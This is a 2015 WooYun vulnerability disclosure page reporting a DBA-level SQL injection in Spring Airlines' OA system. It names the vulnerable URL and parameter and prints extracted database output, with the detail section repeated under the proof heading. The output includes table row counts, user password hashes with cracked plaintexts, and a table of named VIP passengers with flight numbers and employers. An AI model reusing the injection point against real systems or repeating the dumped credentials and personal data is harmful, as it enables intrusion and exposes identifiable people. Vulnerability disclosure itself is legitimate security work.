当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091332

漏洞标题:春秋航空一处DBA权限SQL注入漏洞(大量用户与企业信息)

相关厂商:春秋航空

漏洞作者: 路人甲

提交时间:2015-01-12 11:38

修复时间:2015-02-26 11:38

公开时间:2015-02-26 11:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-12: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-26: 细节向公众公开

简要描述:

DBA权限SQL注入

详细说明:

发现的最后一处,也是DBA权限,影响敏感数据
http://oa.china-sss.com/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile

o.jpg


看看影响的数据量:

Database: EZOFFICE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WF_PROCEEDREADWRITECONTROL     | 36847708 |
| SECURITY_LOG                   | 8217442 |
| OA_MAIL_USER                   | 8212896 |
| WF_DEALWITHLOG                 | 3225535 |
| OA_INFORMATIONSTATISTICS       | 2369012 |
| OA_INFORMATIONBROWSER          | 2078411 |
| OA_MAILINTERIOR                | 2047206 |
| WF_PROCEEDTRANSITION           | 1847406 |
| OA_MAILACCESSORY               | 1762672 |
| WF_PROCEEDTR                   | 1734069 |
| OA_ALLATTACH                   | 1723302 |
| WF_PROCEEDACTIVITY             | 1652590 |
| WF_WORK                        | 1499003 |
| WF_DEALWITHCOMMENT             | 1397833 |
| WF_DEALWITH                    | 804189  |
| MOBIE_FLIGHT                   | 216281  |
| WF_PROCEEDFLOW                 | 164529  |
| MOBIE_FLIGHT_RATE              | 108200  |
| OA_EVENTATTENDER               | 65247   |
| OA_EVENT                       | 65169   |
| OA_WAITPIGEONHOLE              | 52645   |
| OA_INFORMATIONACCESSORY        | 37488   |
| ORG_SYNCRTX                    | 34181   |
| CQ_CLIENT_CONTACT_STATISTICS   | 27798   |
| GOV_SENDDOCUMENTUPDATE         | 27146   |
| GOV_DOCUMENTSENDFILE           | 26535   |
| GJ_STOCKCHANGE                 | 25692   |
| OA_INFORMATION                 | 24601   |
| GJ_SSDETAIL                    | 21898   |
| WHIR$T1073                     | 21479   |
| WF_READWRITECONTROL            | 20553   |
| MOBILE_VIP                     | 20345   |
| T1038                          | 20213   |
| OA_BOARDROOM_MEETINGTIME       | 19899   |
| OA_BOARDROOMAPPLY              | 18595   |
| CQ_ZJ_KPI_DAY                  | 17901   |
| OA_BOARDROOM_PERSONS           | 17432   |
| DOCUMENT                       | 16682   |
| DOCUMENT_FILE                  | 16459   |
| OA_PASSWORD_HISTORY            | 15625   |
| GOV_SENDFILE_USER              | 14279   |
| BK_TEMP_TABLE_20100818         | 14169   |
| GOV_RECEIVEFILE                | 13463   |
| GOV_SENDFILENOBROWSER          | 13137   |
| OA_PERSONOA_USER_PRESS_RELATIO | 10993   |
| WHIR$T3012                     | 10602   |


截取部分密码记录,发现111111,000000,,123456弱口令:

Database: EZOFFICE
Table: OA_PASSWORD_HISTORY
[63 entries]
+----------------+----------------------------------------------+
| CREATE_USER_ID | HISTORY_PASSWORD                             |
+----------------+----------------------------------------------+
| 7559           | 23FF17389ACBFD020043268FB49E7048 (000009)    |
| 7560           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7561           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7562           | 1A616887D3FE44D7B4BA72BBCBD752F4             |
| 7564           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7566           | C8C605999F3D8352D7BB792CF3FDB25B (999999999) |
| 7567           | E10ADC3949BA59ABBE56E057F20F883E (123456)    |
| 7568           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7569           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7572           | 883AB39D4B9117D58BCB0BFDCA137D2C             |
| 7573           | CAB1CB1BD6063D5C61712124DFD9668C (020895)    |
| 7574           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7575           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7577           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7579           | 5622616CF9BFCA67740E38C1E56EAC33 (456321)    |
| 7580           | 271EF14B0450DAC06ACDAE5CC495A1FB             |
| 7585           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7586           | E1B5E8F41A891AD625F6AB516A2376FA             |
| 7589           | 670B14728AD9902AECBA32E22FA4F6BD (000000)    |
| 7590           | 02C75FB22C75B23DC963C7EB91A062CC (zxcvbnm)   |
| 7591           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7592           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7593           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7594           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7595           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7596           | 45373C316EDD0B9BCD93C5043DCE62AF (801227)    |
| 7597           | E3CEB5881A0A1FDAAD01296D7554868D (222222)    |
| 7598           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7600           | 69ABA1EA9D96E7A4C50A4B6DC5A52A0A             |
| 7601           | 616015B2238B6AB43C26913328498ED8             |
| 7602           | 221AE0119174571CC8B7D924EB87AA33             |
| 7606           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7607           | 71946D6F6C5FD7E031F49B5191910E8B (161616)    |
| 7608           | 6E4D3C428CA5E49AEA173FE4F6397DF0             |
| 7609           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7610           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7611           | D1BD48AF210FB1F485FF8A1FFCDEA27B             |
| 7722           | 646FBFDC557AA07E69027DCE0A181822             |
| 7723           | 166502A34D92302FC02D61E23F165E3E (850903)    |
| 7724           | E10ADC3949BA59ABBE56E057F20F883E (123456)    |
| 7726           | 1549F7AD016431CDB13FC62CDEC3116D             |
| 7727           | 9973032D1B498D15B29551DBCDC3378D             |
| 7499           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7500           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7502           | 6209804952225AB3D14348307B5A4A27 (amanda)    |
| 7503           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7504           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7505           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7506           | 21218CCA77804D2BA1922C33E0151105 (888888)    |
| 7507           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7508           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7510           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7511           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7512           | E824CE8FE0A3AD69FBED01E7B62A4EBD             |
| 7513           | 6D2C091005B533901958524C1F7E5D8B             |
| 7514           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7515           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7517           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7519           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7520           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7521           | 67CB83AC25D411B6EF23E9E610560AFE             |
| 7522           | F5991A8C3888DEF61BE6A6661A510911             |
| 7523           | A75A20E0BFCAC4668F4AD5A9211C8A17             |
+----------------+----------------------------------------------+


看看VIP信息,flightno航班号侧漏:

Table: MOBILE_VIP
[117 entries]
+------------+----------+------------+----------+------------------------------+-----------+
| CREATEDATE | FLIGHTNO | JOBNAME    | TIMEFLAG | USERS_NAME                   | VIPDATE   |
+------------+----------+------------+----------+------------------------------+-----------+
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SAE LEE MUAIKIAH             | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SRINARM PANU                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SUTHIRATSEREEKUL NAMATSAPORN | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SUTTHIPONG NAIYIN            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | TANGTHAI CHANANKON           | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | THONGSUK SAKHON              | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | VIRIYAKITSEREEVONG UBONWAN   | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | THANANAN VERONIKA            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | AIMVASAN NAT                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | CHAINITHISUPHAKON TANAKIT    | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KAROON WINAI                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KETUSORN CHULANEE            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KHAWKHAM SIWAPORN            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | ONWIMON NACHATTREE           | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | RAWEEWAT PHATCHAREE          | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | CHAINITHISUPHAKON KOPKRIT    | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 钱丽萍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 沙昊旻                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 毕谢庆                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈峰云                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈士珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈祖东                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 范建伟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 方菊妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 方佩宇                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 费西华                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 封梅                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 龚龙芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 顾能能                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 胡庆琳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 蔡程娥                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈福妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈丽珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈鸣明                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈元德                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈征                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 杜伟利                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 胡永娟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 倪明德                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 潘功臣                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 彭秋林                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 乔坚华                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 施惠妹                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 杜雅玲                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 金永清                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 林于蓝                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘晓滢                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 唐金凤                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 袁卫红                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 俞华                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 俞晏平                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 张水英                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 周剑                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 苏文                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 孙华静                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 谭嘉英                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 唐新娟                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王芳                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王豪杰                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王银燕                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 韦巍                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 吴惠莉                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 王平儿                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 黄建荣                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 姜强                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 金霞                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 李凤仙                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 李景辉                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘海军                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘秀龙                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陆伟兵                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马菊芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马骏                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 马兴媛                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 倪喜珍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 邵宏磊                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 沈振丽                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 施云峰                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈锡鹏                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 陈燕                           | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 邓群芳                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 翟红梅                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 郭红梅                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 韩建萍                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 洪志琴                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 黄菊花                          | 22-OCT-12 |
| 22-OCT-12  | 9C8935   | 建信人寿保险有限公司 | 0        | 刘兴红                          | 22-OCT-12 |
| 03-NOV-12  | 9C8823   | 遵义机场财务部长   | 1        | 王芳                           | 03-NOV-12 |
| 03-NOV-12  | 9C8823   | 遵义机场财务部长   | 1        | 吴多群                          | 03-NOV-12 |
| 10-NOV-12  | 9C8829   | NULL       | 0        | 吴冬                           | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | WUYING                       | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | LIYINAN                      | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生剧组     | 1        | CHENXI                       | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | SHIMINJIE                    | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生       | 1        | HANHUINI                     | 10-NOV-12 |
| 10-NOV-12  | 9C8921   | 财富人生剧组     | 1        | GUGUOJIE                     | 10-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 齐守印                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 胡德仁                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政厅      | 0        | 池孟江                          | 14-NOV-12 |
| 14-NOV-12  | 9C8976   | 河北财政       | 0        | 周巧娥                          | 14-NOV-12 |
| 08-DEC-12  | 9C8959   | 欧美部关系户     | 1        | LO WONG SAIYING SYLVIA       | 08-DEC-12 |
| 08-DEC-12  | 9C8959   | 欧美部        | 1        | LO AARON SAIPING             | 08-DEC-12 |
| 09-DEC-12  | 9C8959   | 欧美部关系户     | 0        | LO WONG SAIYING SYLVIA       | 09-DEC-12 |
| 09-DEC-12  | 9C8959   | 欧美部        | 0        | LO AARON SAIPING             | 09-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | WANG PENG                    | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | ZHOU DAN                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | CHEN JUN                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | HU FEI                       | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | WANG SONGLIN                 | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | LI GANG                      | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | TAN YANG                     | 14-DEC-12 |
| 14-DEC-12  | 9C8580   | 涂料公司       | 1        | YUAN YANI                    | 14-DEC-12 |
| 26-OCT-12  | 9C8899   | 河北省电信局     | 0        | 马冀民                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 沈芸筠                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 张秀珍                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 沈宇清                          | 26-OCT-12 |
| 26-OCT-12  | 9C8936   | 建信人寿保险有限公司 | 0        | 卫丹波                          | 26-OCT-12 |
+------------+----------+------------+----------+------------------------------+-----------+

漏洞证明:

发现的最后一处,也是DBA权限,影响敏感数据
http://oa.china-sss.com/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile

o.jpg


看看影响的数据量:

Database: EZOFFICE
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| WF_PROCEEDREADWRITECONTROL     | 36847708 |
| SECURITY_LOG                   | 8217442 |
| OA_MAIL_USER                   | 8212896 |
| WF_DEALWITHLOG                 | 3225535 |
| OA_INFORMATIONSTATISTICS       | 2369012 |
| OA_INFORMATIONBROWSER          | 2078411 |
| OA_MAILINTERIOR                | 2047206 |
| WF_PROCEEDTRANSITION           | 1847406 |
| OA_MAILACCESSORY               | 1762672 |
| WF_PROCEEDTR                   | 1734069 |
| OA_ALLATTACH                   | 1723302 |
| WF_PROCEEDACTIVITY             | 1652590 |
| WF_WORK                        | 1499003 |
| WF_DEALWITHCOMMENT             | 1397833 |
| WF_DEALWITH                    | 804189  |
| MOBIE_FLIGHT                   | 216281  |
| WF_PROCEEDFLOW                 | 164529  |
| MOBIE_FLIGHT_RATE              | 108200  |
| OA_EVENTATTENDER               | 65247   |
| OA_EVENT                       | 65169   |
| OA_WAITPIGEONHOLE              | 52645   |
| OA_INFORMATIONACCESSORY        | 37488   |
| ORG_SYNCRTX                    | 34181   |
| CQ_CLIENT_CONTACT_STATISTICS   | 27798   |
| GOV_SENDDOCUMENTUPDATE         | 27146   |
| GOV_DOCUMENTSENDFILE           | 26535   |
| GJ_STOCKCHANGE                 | 25692   |
| OA_INFORMATION                 | 24601   |
| GJ_SSDETAIL                    | 21898   |
| WHIR$T1073                     | 21479   |
| WF_READWRITECONTROL            | 20553   |
| MOBILE_VIP                     | 20345   |
| T1038                          | 20213   |
| OA_BOARDROOM_MEETINGTIME       | 19899   |
| OA_BOARDROOMAPPLY              | 18595   |
| CQ_ZJ_KPI_DAY                  | 17901   |
| OA_BOARDROOM_PERSONS           | 17432   |
| DOCUMENT                       | 16682   |
| DOCUMENT_FILE                  | 16459   |
| OA_PASSWORD_HISTORY            | 15625   |
| GOV_SENDFILE_USER              | 14279   |
| BK_TEMP_TABLE_20100818         | 14169   |
| GOV_RECEIVEFILE                | 13463   |
| GOV_SENDFILENOBROWSER          | 13137   |
| OA_PERSONOA_USER_PRESS_RELATIO | 10993   |
| WHIR$T3012                     | 10602   |


截取部分密码记录,发现111111,000000,,123456弱口令:

Database: EZOFFICE
Table: OA_PASSWORD_HISTORY
[63 entries]
+----------------+----------------------------------------------+
| CREATE_USER_ID | HISTORY_PASSWORD                             |
+----------------+----------------------------------------------+
| 7559           | 23FF17389ACBFD020043268FB49E7048 (000009)    |
| 7560           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7561           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7562           | 1A616887D3FE44D7B4BA72BBCBD752F4             |
| 7564           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7566           | C8C605999F3D8352D7BB792CF3FDB25B (999999999) |
| 7567           | E10ADC3949BA59ABBE56E057F20F883E (123456)    |
| 7568           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7569           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7572           | 883AB39D4B9117D58BCB0BFDCA137D2C             |
| 7573           | CAB1CB1BD6063D5C61712124DFD9668C (020895)    |
| 7574           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7575           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7577           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7579           | 5622616CF9BFCA67740E38C1E56EAC33 (456321)    |
| 7580           | 271EF14B0450DAC06ACDAE5CC495A1FB             |
| 7585           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7586           | E1B5E8F41A891AD625F6AB516A2376FA             |
| 7589           | 670B14728AD9902AECBA32E22FA4F6BD (000000)    |
| 7590           | 02C75FB22C75B23DC963C7EB91A062CC (zxcvbnm)   |
| 7591           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7592           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7593           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7594           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7595           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7596           | 45373C316EDD0B9BCD93C5043DCE62AF (801227)    |
| 7597           | E3CEB5881A0A1FDAAD01296D7554868D (222222)    |
| 7598           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7600           | 69ABA1EA9D96E7A4C50A4B6DC5A52A0A             |
| 7601           | 616015B2238B6AB43C26913328498ED8             |
| 7602           | 221AE0119174571CC8B7D924EB87AA33             |
| 7606           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7607           | 71946D6F6C5FD7E031F49B5191910E8B (161616)    |
| 7608           | 6E4D3C428CA5E49AEA173FE4F6397DF0             |
| 7609           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7610           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7611           | D1BD48AF210FB1F485FF8A1FFCDEA27B             |
| 7722           | 646FBFDC557AA07E69027DCE0A181822             |
| 7723           | 166502A34D92302FC02D61E23F165E3E (850903)    |
| 7724           | E10ADC3949BA59ABBE56E057F20F883E (123456)    |
| 7726           | 1549F7AD016431CDB13FC62CDEC3116D             |
| 7727           | 9973032D1B498D15B29551DBCDC3378D             |
| 7499           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7500           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7502           | 6209804952225AB3D14348307B5A4A27 (amanda)    |
| 7503           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7504           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7505           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7506           | 21218CCA77804D2BA1922C33E0151105 (888888)    |
| 7507           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7508           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7510           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7511           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7512           | E824CE8FE0A3AD69FBED01E7B62A4EBD             |
| 7513           | 6D2C091005B533901958524C1F7E5D8B             |
| 7514           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7515           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7517           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7519           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7520           | 96E79218965EB72C92A549DD5A330112 (111111)    |
| 7521           | 67CB83AC25D411B6EF23E9E610560AFE             |
| 7522           | F5991A8C3888DEF61BE6A6661A510911             |
| 7523           | A75A20E0BFCAC4668F4AD5A9211C8A17             |
+----------------+----------------------------------------------+


看看VIP信息,flightno航班号侧漏:

Table: MOBILE_VIP
[117 entries]
+------------+----------+------------+----------+------------------------------+-----------+
| CREATEDATE | FLIGHTNO | JOBNAME    | TIMEFLAG | USERS_NAME                   | VIPDATE   |
+------------+----------+------------+----------+------------------------------+-----------+
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SAE LEE MUAIKIAH             | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SRINARM PANU                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SUTHIRATSEREEKUL NAMATSAPORN | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | SUTTHIPONG NAIYIN            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | TANGTHAI CHANANKON           | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | THONGSUK SAKHON              | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | VIRIYAKITSEREEVONG UBONWAN   | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | THANANAN VERONIKA            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | AIMVASAN NAT                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | CHAINITHISUPHAKON TANAKIT    | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KAROON WINAI                 | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KETUSORN CHULANEE            | 22-OCT-12 |
| 22-OCT-12  | 9C8580   | 安惠生物科技有限公司 | 0        | KHAWKHAM SIWAPORN            | 22-OCT-12 |
